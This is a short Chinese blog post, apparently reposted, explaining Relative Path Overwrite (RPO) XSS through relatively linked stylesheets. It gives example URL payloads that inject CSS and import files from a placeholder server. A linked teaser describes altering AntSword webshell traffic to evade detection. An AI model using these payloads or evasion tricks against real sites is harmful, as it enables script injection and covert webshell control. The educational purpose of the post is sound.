XSS:RPO(Relative Path Overwrite)攻击

admin 2021年9月1日14:56:30评论60 views字数 528阅读1分45秒阅读模式

0x00

具体原理参考:
Infinite Security: (Relative Path Overwrite) RPO XSS
RPO Gadgets
RPO攻击

0x01

RPO攻击首先利用的是通过相对路径引入的CSS,如

<link href="styles.css" rel="stylesheet" type="text/css" />

当我们在URL最后添加

/%0a{}*{background:red;}/

的时候会发现页面执行了我们的css代码。
通过这点,我们可以做到任意加载服务器上的文件。
假若我们能控制某些文件就可以达到XSS的目的。

几个Payload:

/%0a{}@import url("http://server/style.css")/
/%0a{}img{behavior:url(http://server/test.png);}/

FROM :rickyhao.com | rickyhao.com

相关推荐: 蚁剑流量改造学习

流量分析 挂个代理直接抓包就好了 UA头修改 修改蚁剑工作目录的/modules/request.js,这里面默认是antSword/v2.1 一般需要修改一下,不然极其容易被发现,可以利用平常爬虫的一些技巧,随机构造UA头 ``` let USER_AGEN…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月1日14:56:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   XSS:RPO(Relative Path Overwrite)攻击https://cn-sec.com/archives/499680.html

发表评论

匿名网友 填写信息